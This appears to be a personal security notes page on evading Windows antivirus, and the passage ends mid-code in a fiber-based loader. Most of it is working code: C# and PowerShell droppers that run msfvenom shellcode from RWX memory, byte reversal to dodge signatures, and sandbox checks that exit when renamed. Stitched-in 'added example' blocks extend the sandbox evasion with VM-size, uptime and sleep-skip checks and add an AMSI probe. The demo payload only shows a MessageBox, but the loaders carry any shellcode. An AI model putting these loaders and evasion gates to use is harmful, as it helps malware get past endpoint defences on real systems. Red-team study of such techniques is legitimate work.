ctfnote (/home/ret2basic.eth)
AV Evasion with C# and PowerShell


Last updated 2 years ago


Setup

In Visual Studio, create an empty C# project and name it "AV_Evasion". Add a C# class file named "Dropper.cs"; it will hold the static Main() entry point and the P/Invoke declarations used below.

AV Evasion with CSharp

Msfvenom Payload

On Kali, generate a vanilla MessageBox payload with msfvenom (a 64-bit payload that only pops a MessageBox, so it can be uploaded to a scanner without shipping a real reverse shell):

msfvenom -p windows/x64/messagebox -f exe -o msgbox64.exe

Upload msgbox64.exe to VirusTotal:

This payload does not pass the Windows Defender check: an unmodified msfvenom executable matches a static signature immediately.

Dropper

On Kali, generate MessageBox payload in C# format:

msfvenom -p windows/x64/messagebox -f csharp

In Visual Studio, write a dropper in C#. It allocates an RWX region in its own process, copies the shellcode in and starts a new thread at that address:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace AV_Evasion
{
	class Dropper
	{
		// 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: one RWX region for the shellcode.
		[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
		static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint
			flAllocationType, uint flProtect);

		// New thread whose start address is the shellcode buffer.
		[DllImport("kernel32.dll")]
		static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
			IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

		// 0xFFFFFFFF = INFINITE: keep the process alive until the shellcode thread returns.
		[DllImport("kernel32.dll")]
		static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

		static void Main(string[] args)
		{
			// msfvenom -p windows/x64/messagebox -f csharp (unmodified shellcode, stored in execution order)
			byte[] buf = new byte[295] {
			0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
			0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
			0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
			0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
			0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
			0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
			0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
			0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
			0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
			0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
			0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
			0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
			0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
			0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
			0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
			0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,
			0x85,0x0f,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
			0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c,
			0x6c,0x6f,0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,
			0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 };

			int size = buf.Length;
			IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
			Marshal.Copy(buf, 0, addr, size);
			IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
			WaitForSingleObject(hThread, 0xFFFFFFFF);
		}
	}
}

Build it and upload the executable to VirusTotal:

This payload does not pass the Windows Defender check: the plain shellcode bytes embedded in the binary are enough for a static match.

"Double Reverse" Technique

Store the shellcode reversed (the last msfvenom byte first) so the signatured byte sequence never appears in the binary, and call Array.Reverse() at runtime to restore the original order just before copying it into memory:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace AV_Evasion
{
	class Dropper
	{
		[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
		static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint
			flAllocationType, uint flProtect);

		[DllImport("kernel32.dll")]
		static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
			IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

		[DllImport("kernel32.dll")]
		static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

		static void Main(string[] args)
		{
			// msfvenom -p windows/x64/messagebox -f csharp, with the bytes stored in reverse order
			byte[] waffle = new byte[295] {
			0x00, 0x78, 0x6f, 0x42, 0x65, 0x67, 0x61, 0x73, 0x73, 0x65, 0x4d, 0x00, 0x21, 0x46, 0x53, 0x4d, 0x20, 0x6d, 0x6f, 0x72, 0x66, 0x20, 0x2c, 0x6f, 0x6c, 0x6c, 0x65, 0x48, 0xd5, 0xff, 0x56, 0xa2, 0xb5, 0xf0, 0xba, 0x41, 0xc9, 0x31, 0x48, 0xd5, 0xff, 0x07, 0x56, 0x83, 0x45, 0xba, 0x41, 0xc9, 0x31, 0x48, 0x00, 0x00, 0x01, 0x0f, 0x85, 0x8d, 0x4c, 0x3e, 0x00, 0x00, 0x00, 0xfe, 0x95, 0x8d, 0x48, 0x3e, 0x00, 0x00, 0x00, 0x00, 0xc1, 0xc7, 0x49, 0x5d, 0xff, 0xff, 0xff, 0x49, 0xe9, 0x12, 0x8b, 0x48, 0x3e, 0x5a, 0x59, 0x41, 0x58, 0xe0, 0xff, 0x52, 0x41, 0x20, 0xec, 0x83, 0x48, 0x5a, 0x41, 0x59, 0x41, 0x58, 0x41, 0x5a, 0x59, 0x5e, 0x58, 0x41, 0x58, 0x41, 0xd0, 0x01, 0x48, 0x88, 0x04, 0x8b, 0x41, 0x3e, 0xd0, 0x01, 0x49, 0x1c, 0x40, 0x8b, 0x44, 0x3e, 0x48, 0x0c, 0x8b, 0x41, 0x3e, 0x66, 0xd0, 0x01, 0x49, 0x24, 0x40, 0x8b, 0x44, 0x3e, 0x58, 0xd6, 0x75, 0xd1, 0x39, 0x45, 0x08, 0x24, 0x4c, 0x03, 0x4c, 0x3e, 0xf1, 0x75, 0xe0, 0x38, 0xc1, 0x01, 0x41, 0x0d, 0xc9, 0xc1, 0x41, 0xac, 0xc0, 0x31, 0x48, 0xc9, 0x31, 0x4d, 0xd6, 0x01, 0x48, 0x88, 0x34, 0x8b, 0x41, 0x3e, 0xc9, 0xff, 0x48, 0x5c, 0xe3, 0xd0, 0x01, 0x49, 0x20, 0x40, 0x8b, 0x44, 0x3e, 0x18, 0x48, 0x8b, 0x3e, 0x50, 0xd0, 0x01, 0x48, 0x6f, 0x74, 0xc0, 0x85, 0x48, 0x00, 0x00, 0x00, 0x88, 0x80, 0x8b, 0x3e, 0xd0, 0x01, 0x48, 0x3c, 0x42, 0x8b, 0x3e, 0x20, 0x52, 0x8b, 0x48, 0x3e, 0x51, 0x41, 0x52, 0xed, 0xe2, 0xc1, 0x01, 0x41, 0x0d, 0xc9, 0xc1, 0x41, 0x20, 0x2c, 0x02, 0x7c, 0x61, 0x3c, 0xac, 0xc0, 0x31, 0x48, 0xc9, 0x31, 0x4d, 0x4a, 0x4a, 0xb7, 0x0f, 0x48, 0x3e, 0x50, 0x72, 0x8b, 0x48, 0x3e, 0x20, 0x52, 0x8b, 0x48, 0x3e, 0x18, 0x52, 0x8b, 0x48, 0x3e, 0x60, 0x52, 0x8b, 0x48, 0x65, 0xd2, 0x31, 0x48, 0x56, 0x51, 0x52, 0x50, 0x41, 0x51, 0x41, 0x00, 0x00, 0x00, 0xd0, 0xe8, 0xff, 0xff, 0xff, 0xf0, 0xe4, 0x81, 0x48, 0xfc
			};

			Array.Reverse(waffle);

			int size = waffle.Length;
			IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
			Marshal.Copy(waffle, 0, addr, size);
			IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
			WaitForSingleObject(hThread, 0xFFFFFFFF);
		}
	}
}

Build it and upload the executable to VirusTotal:

Reversing the bytes alone is not enough: Windows Defender still flags this executable, so the detection is not just a static match on the shellcode bytes.
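The page reverses the array by hand. As an added example (not code from the original page or from the Hop Infosec posts it follows), this small console tool produces the reversed C# literal from raw msfvenom output (`msfvenom -p windows/x64/messagebox -f raw -o msgbox.bin`) and verifies the round trip, so a miscounted or mis-ordered byte cannot slip into the dropper. The tool name ReverseShellcode, the file name msgbox.bin and the built-in sample bytes are assumptions.

```csharp
// Added example, not from the original page: emits the reversed byte[] literal used by
// the "double reverse" dropper and checks that reversing it again restores the input.
//   msfvenom -p windows/x64/messagebox -f raw -o msgbox.bin     (assumed file name)
//   ReverseShellcode.exe msgbox.bin waffle > reversed.txt
using System;
using System.IO;
using System.Text;

namespace AV_Evasion
{
    static class ReverseShellcode
    {
        // Returns a reversed copy so the caller keeps the original for the round-trip check.
        public static byte[] ReverseCopy(byte[] shellcode)
        {
            byte[] reversed = (byte[])shellcode.Clone();
            Array.Reverse(reversed);
            return reversed;
        }

        // Renders bytes as a C# array initializer, 16 per line, with no fixed length in the
        // declaration so a wrong "new byte[N]" count can never break the build.
        public static string ToCSharpLiteral(byte[] bytes, string name)
        {
            StringBuilder sb = new StringBuilder();
            sb.Append("byte[] ").Append(name).Append(" = new byte[] {");
            for (int i = 0; i < bytes.Length; i++)
            {
                if (i % 16 == 0) sb.AppendLine().Append("    ");
                sb.Append("0x").Append(bytes[i].ToString("x2"));
                if (i != bytes.Length - 1) sb.Append(",");
            }
            sb.AppendLine().Append("};");
            return sb.ToString();
        }

        static int Main(string[] args)
        {
            string name = args.Length > 1 ? args[1] : "waffle";
            byte[] raw;
            if (args.Length > 0)
            {
                raw = File.ReadAllBytes(args[0]);
            }
            else
            {
                // Constructed sample input (the first bytes of the page's msfvenom output) so the
                // tool runs with no arguments; use the real .bin file in practice.
                raw = new byte[] { 0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff,
                                   0xe8, 0xd0, 0x00, 0x00, 0x00, 0x41, 0x51 };
            }

            byte[] reversed = ReverseCopy(raw);

            // Round trip: what the dropper does at runtime must give back the original bytes.
            byte[] restored = ReverseCopy(reversed);
            for (int i = 0; i < raw.Length; i++)
            {
                if (raw[i] != restored[i])
                {
                    Console.Error.WriteLine("round trip failed at offset " + i);
                    return 1;
                }
            }

            Console.WriteLine("// " + raw.Length + " bytes stored in reverse order; call Array.Reverse(" + name + ") before use");
            Console.WriteLine(ToCSharpLiteral(reversed, name));
            return 0;
        }
    }
}
```

Paste the printed literal into Dropper.cs in place of the hand-reversed array; the runtime side stays exactly as on the page (Array.Reverse, VirtualAlloc, Marshal.Copy, CreateThread).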

Sandbox

Before a suspicious executable is allowed to run, most AV engines first execute it in an emulator or lightweight virtual machine (a sandbox) and watch what it does.

Many sandboxes rename the sample before executing it. We can use System.Diagnostics.Process.GetCurrentProcess() at runtime to read our own process name and compare it with the name we built the binary under; if it differs, we are probably inside a sandbox and should simply exit before touching the shellcode. Note that ProcessName is the executable name without the .exe extension (MainModule.ModuleName is the name with it), so the string we compare against must not end in ".exe":

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace AV_Evasion
{
	class Dropper
	{
		[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
		static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint
			flAllocationType, uint flProtect);

		[DllImport("kernel32.dll")]
		static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
			IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

		[DllImport("kernel32.dll")]
		static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

		static void Main(string[] args)
		{
			// Sandboxes often rename the sample: exit if our name is not the one we built.
			// ProcessName has no extension: "AV_Evasion_3", not "AV_Evasion_3.exe".
			string proc = Process.GetCurrentProcess().ProcessName;

			if (proc != "AV_Evasion_3")
			{
				Environment.Exit(0);
			}

			// msfvenom -p windows/x64/messagebox -f csharp, with the bytes stored in reverse order
			byte[] waffle = new byte[295] {
			0x00, 0x78, 0x6f, 0x42, 0x65, 0x67, 0x61, 0x73, 0x73, 0x65, 0x4d, 0x00, 0x21, 0x46, 0x53, 0x4d, 0x20, 0x6d, 0x6f, 0x72, 0x66, 0x20, 0x2c, 0x6f, 0x6c, 0x6c, 0x65, 0x48, 0xd5, 0xff, 0x56, 0xa2, 0xb5, 0xf0, 0xba, 0x41, 0xc9, 0x31, 0x48, 0xd5, 0xff, 0x07, 0x56, 0x83, 0x45, 0xba, 0x41, 0xc9, 0x31, 0x48, 0x00, 0x00, 0x01, 0x0f, 0x85, 0x8d, 0x4c, 0x3e, 0x00, 0x00, 0x00, 0xfe, 0x95, 0x8d, 0x48, 0x3e, 0x00, 0x00, 0x00, 0x00, 0xc1, 0xc7, 0x49, 0x5d, 0xff, 0xff, 0xff, 0x49, 0xe9, 0x12, 0x8b, 0x48, 0x3e, 0x5a, 0x59, 0x41, 0x58, 0xe0, 0xff, 0x52, 0x41, 0x20, 0xec, 0x83, 0x48, 0x5a, 0x41, 0x59, 0x41, 0x58, 0x41, 0x5a, 0x59, 0x5e, 0x58, 0x41, 0x58, 0x41, 0xd0, 0x01, 0x48, 0x88, 0x04, 0x8b, 0x41, 0x3e, 0xd0, 0x01, 0x49, 0x1c, 0x40, 0x8b, 0x44, 0x3e, 0x48, 0x0c, 0x8b, 0x41, 0x3e, 0x66, 0xd0, 0x01, 0x49, 0x24, 0x40, 0x8b, 0x44, 0x3e, 0x58, 0xd6, 0x75, 0xd1, 0x39, 0x45, 0x08, 0x24, 0x4c, 0x03, 0x4c, 0x3e, 0xf1, 0x75, 0xe0, 0x38, 0xc1, 0x01, 0x41, 0x0d, 0xc9, 0xc1, 0x41, 0xac, 0xc0, 0x31, 0x48, 0xc9, 0x31, 0x4d, 0xd6, 0x01, 0x48, 0x88, 0x34, 0x8b, 0x41, 0x3e, 0xc9, 0xff, 0x48, 0x5c, 0xe3, 0xd0, 0x01, 0x49, 0x20, 0x40, 0x8b, 0x44, 0x3e, 0x18, 0x48, 0x8b, 0x3e, 0x50, 0xd0, 0x01, 0x48, 0x6f, 0x74, 0xc0, 0x85, 0x48, 0x00, 0x00, 0x00, 0x88, 0x80, 0x8b, 0x3e, 0xd0, 0x01, 0x48, 0x3c, 0x42, 0x8b, 0x3e, 0x20, 0x52, 0x8b, 0x48, 0x3e, 0x51, 0x41, 0x52, 0xed, 0xe2, 0xc1, 0x01, 0x41, 0x0d, 0xc9, 0xc1, 0x41, 0x20, 0x2c, 0x02, 0x7c, 0x61, 0x3c, 0xac, 0xc0, 0x31, 0x48, 0xc9, 0x31, 0x4d, 0x4a, 0x4a, 0xb7, 0x0f, 0x48, 0x3e, 0x50, 0x72, 0x8b, 0x48, 0x3e, 0x20, 0x52, 0x8b, 0x48, 0x3e, 0x18, 0x52, 0x8b, 0x48, 0x3e, 0x60, 0x52, 0x8b, 0x48, 0x65, 0xd2, 0x31, 0x48, 0x56, 0x51, 0x52, 0x50, 0x41, 0x51, 0x41, 0x00, 0x00, 0x00, 0xd0, 0xe8, 0xff, 0xff, 0xff, 0xf0, 0xe4, 0x81, 0x48, 0xfc
			};

			Array.Reverse(waffle);

			int size = waffle.Length;
			IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
			Marshal.Copy(waffle, 0, addr, size);
			IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
			WaitForSingleObject(hThread, 0xFFFFFFFF);
		}
	}
}

Right-click the project "AV_Evasion", go to "Add Reference..." and add System. Build it (the assembly name must be the one the check compares against) and upload the executable to VirusTotal:

This payload passes the Windows Defender check. Before trusting that verdict, run the binary on a normal host and confirm the MessageBox actually appears: if the name check never matches (for example because it compares against a name ending in ".exe" while ProcessName has no extension), the program exits everywhere, and the scanner reports clean only because the shellcode never ran.
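The page gates on one indicator, the process name. As an added example (not code from the original page or from Hop Infosec), the gate below goes a little further: it compares both the extension-less ProcessName and the MainModule name so the ".exe" pitfall cannot bite, and adds two more common sandbox heuristics (small VM, accelerated Sleep). The expected name AV_Evasion_3, the thresholds and the class name SandboxGate are assumptions for illustration.

```csharp
// Added example, not code from the original page: a sandbox gate that extends the page's
// process-name check. Expected name, thresholds and the class name are assumptions.
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Threading;

namespace AV_Evasion
{
    static class SandboxGate
    {
        // Process.ProcessName never carries ".exe"; MainModule.ModuleName does.
        // Comparing ProcessName against "Foo.exe" would make the gate exit everywhere.
        public static bool WasRenamed(string expectedBaseName)
        {
            Process self = Process.GetCurrentProcess();
            string byName = self.ProcessName;              // e.g. "AV_Evasion_3"
            string byModule = self.MainModule.ModuleName;  // e.g. "AV_Evasion_3.exe"
            return !string.Equals(byName, expectedBaseName, StringComparison.OrdinalIgnoreCase)
                || !string.Equals(byModule, expectedBaseName + ".exe", StringComparison.OrdinalIgnoreCase);
        }

        // Analysis VMs are commonly provisioned small and booted just before the sample runs.
        public static bool LooksUnderProvisioned(int minCores, uint minUptimeMs)
        {
            uint uptimeMs = unchecked((uint)Environment.TickCount); // ms since boot, wraps after ~49 days
            return Environment.ProcessorCount < minCores || uptimeMs < minUptimeMs;
        }

        // Some sandboxes fast-forward Sleep() so the sample reaches its payload quickly;
        // then far less wall-clock time elapses than was requested.
        public static bool SleepWasSkipped(int sleepMs)
        {
            Stopwatch sw = Stopwatch.StartNew();
            Thread.Sleep(sleepMs);
            return sw.ElapsedMilliseconds < sleepMs / 2;
        }

        // Collects every indicator that fired so the gate can be debugged on a real host.
        public static List<string> Indicators(string expectedBaseName)
        {
            List<string> hits = new List<string>();
            if (WasRenamed(expectedBaseName)) hits.Add("executable was renamed");
            if (LooksUnderProvisioned(2, 5 * 60 * 1000)) hits.Add("fewer than 2 cores or booted under 5 minutes ago");
            if (SleepWasSkipped(2000)) hits.Add("Sleep() was accelerated");
            return hits;
        }

        static void Main(string[] args)
        {
            // Assumed: the project builds AV_Evasion_3.exe, the name used in the page's check.
            List<string> hits = Indicators("AV_Evasion_3");
            if (hits.Count > 0)
            {
                // Keep this line while testing; remove it from the build you submit to a scanner.
                Console.WriteLine("exiting: " + string.Join("; ", hits));
                Environment.Exit(0);
            }
            Console.WriteLine("no sandbox indicators; the VirtualAlloc / Marshal.Copy / CreateThread sequence of the dropper would run here");
        }
    }
}
```

Two caveats: the Sleep check is blind if the sandbox also patches the performance counter that Stopwatch reads, and every extra indicator is also a way to lose a legitimate target (a one-core VM in the client's environment never receives the payload), so tune the thresholds to where the binary is expected to land.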

AV Evasion with PowerShell

C# -> PowerShell

Generate MessageBox shellcode in PowerShell format with msfvenom:

msfvenom -p windows/x64/messagebox -f ps1

Write a Dropper in PowerShell:

# C# signatures compiled in-process by Add-Type; the methods must be public,
# otherwise PowerShell cannot call them through [Kernel32]::.
$Kernel32 = @"
using System;
using System.Runtime.InteropServices;
public class Kernel32 {

[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll", CharSet=CharSet.Ansi)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("kernel32.dll", SetLastError=true)]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

}
"@
Add-Type $Kernel32

# msfvenom -p windows/x64/messagebox -f ps1

[Byte[]] $buf = 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x3e,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x6f,0x48,0x1,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x3e,0x41,0x8b,0xc,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x3e,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,0x0,0x0,0x0,0x0,0x3e,0x48,0x8d,0x95,0xfe,0x0,0x0,0x0,0x3e,0x4c,0x8d,0x85,0xf,0x1,0x0,0x0,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x7,0xff,0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f,0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x0,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x0

$size = $buf.Length
# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
[IntPtr]$addr = [Kernel32]::VirtualAlloc(0, $size, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size)
$thandle = [Kernel32]::CreateThread(0, 0, $addr, 0, 0, 0)
[Kernel32]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

This script is flagged by AMSI easily:

What is AMSI?

AMSI (the Antimalware Scan Interface) lets script hosts such as PowerShell, Windows Script Host, VBA and the .NET runtime hand the content they are about to execute to the installed AV for scanning at runtime. The content is inspected after it has been decoded or deobfuscated in memory, not only as a file on disk, which is why the on-disk tricks above do not help a PowerShell dropper.

https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal

The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product that's present on a machine. AMSI provides enhanced malware protection for your end-users and their data, applications, and workloads.

AMSI is agnostic of antimalware vendor; it's designed to allow for the most common malware scanning and protection techniques provided by today's antimalware products that can be integrated into applications. It supports a calling structure allowing for file and memory or stream scanning, content source URL/IP reputation checks, and other techniques.
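To see what AMSI actually does, the following added example (not code from the original page or from Hop Infosec) calls the AMSI API the same way a script host does and scans two constructed inputs: the EICAR test string, which every AV flags, and a harmless PowerShell line. The application name AV_Evasion.AmsiProbe and the content names are assumptions; the program runs only on Windows with an AMSI provider registered (Windows Defender with real-time protection enabled), and with no provider every scan comes back as not detected.

```csharp
// Added example, not from the original page: ask the machine's AMSI provider whether a
// buffer is malicious, exactly as PowerShell does for each script block before running it.
using System;
using System.Runtime.InteropServices;
using System.Text;

namespace AV_Evasion
{
    static class AmsiProbe
    {
        [DllImport("amsi.dll", CharSet = CharSet.Unicode)]
        static extern int AmsiInitialize(string appName, out IntPtr amsiContext);

        [DllImport("amsi.dll")]
        static extern void AmsiUninitialize(IntPtr amsiContext);

        [DllImport("amsi.dll")]
        static extern int AmsiOpenSession(IntPtr amsiContext, out IntPtr session);

        [DllImport("amsi.dll")]
        static extern void AmsiCloseSession(IntPtr amsiContext, IntPtr session);

        [DllImport("amsi.dll", CharSet = CharSet.Unicode)]
        static extern int AmsiScanBuffer(IntPtr amsiContext, byte[] buffer, uint length,
            string contentName, IntPtr session, out uint result);

        // AMSI_RESULT: 0 clean, 1 not detected, 0x4000..0x4FFF blocked by admin policy,
        // >= 0x8000 detected. amsi.h defines AmsiResultIsMalware() as "result >= 0x8000".
        const uint AMSI_RESULT_DETECTED = 0x8000;

        public static bool IsMalware(uint amsiResult)
        {
            return amsiResult >= AMSI_RESULT_DETECTED;
        }

        // Scans the content as UTF-16, which is how script hosts hand text to AMSI.
        // Every HRESULT is checked, so a missing amsi.dll or provider surfaces as an exception.
        public static uint Scan(string content, string contentName)
        {
            IntPtr ctx;
            Marshal.ThrowExceptionForHR(AmsiInitialize("AV_Evasion.AmsiProbe", out ctx)); // assumed app name
            try
            {
                IntPtr session;
                Marshal.ThrowExceptionForHR(AmsiOpenSession(ctx, out session));
                try
                {
                    byte[] buf = Encoding.Unicode.GetBytes(content);
                    uint result;
                    Marshal.ThrowExceptionForHR(AmsiScanBuffer(ctx, buf, (uint)buf.Length, contentName, session, out result));
                    return result;
                }
                finally { AmsiCloseSession(ctx, session); }
            }
            finally { AmsiUninitialize(ctx); }
        }

        static void Main(string[] args)
        {
            // Constructed inputs: the EICAR test string and a harmless line of PowerShell.
            string eicar = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";
            string benign = "Write-Host 'hello from a harmless script'";
            string[] names = { "eicar.ps1", "hello.ps1" };
            string[] contents = { eicar, benign };

            for (int i = 0; i < names.Length; i++)
            {
                uint r = Scan(contents[i], names[i]);
                Console.WriteLine(names[i] + ": AMSI_RESULT=0x" + r.ToString("x") + " malware=" + IsMalware(r));
            }
        }
    }
}
```

With Defender active the EICAR buffer comes back as 0x8000 (detected) and the benign line as 0 or 1; scanning a candidate dropper this way before running it is a quick offline check of whether AMSI, rather than the file scanner, is what blocks it.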

AMSI Bypass

However, I have tried many payloads and all of them are blocked by the latest Win11. We will investigate more in the "AMSI Bypass" section.

AV Evasion with Fibers

What is Fiber?

A fiber is a unit of execution that runs inside a thread and is scheduled by the application itself rather than by the Windows kernel.

https://docs.microsoft.com/en-us/windows/win32/procthread/fibers

A fiber is a unit of execution that must be manually scheduled by the application. Fibers run in the context of the threads that schedule them. Each thread can schedule multiple fibers. In general, fibers do not provide advantages over a well-designed multithreaded application. However, using fibers can make it easier to port applications that were designed to schedule their own threads.

Fibers give us an alternative way to execute shellcode: instead of pointing a new thread at our buffer with CreateThread, we turn the current thread into a fiber, create a second fiber whose start address is the buffer and switch to it. No new thread is created, so the CreateThread-on-fresh-RWX-memory pattern that AV commonly watches for never occurs.

Thread -> Fiber

Generate an encoded MessageBox payload with msfvenom. The x64/xor_dynamic encoder wraps the shellcode in a small self-decoding XOR stub, so the plain MessageBox bytes never appear in the binary:

msfvenom -p windows/x64/messagebox -f csharp -e x64/xor_dynamic

Update Dropper.cs:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace AV_Evasion
{
	class Dropper
	{
		[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
		static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint
			flAllocationType, uint flProtect);

		[DllImport("kernel32.dll")]
		static extern IntPtr ConvertThreadToFiber(IntPtr lpParameter);

		[DllImport("kernel32.dll")]
		static extern IntPtr CreateFiber(uint dwStackSize,
			IntPtr lpStartAddress, IntPtr lpParameter);

		[DllImport("kernel32.dll")]
		extern static IntPtr SwitchToFiber(IntPtr fiberAddress);

		static void Main(string[] args)
		{
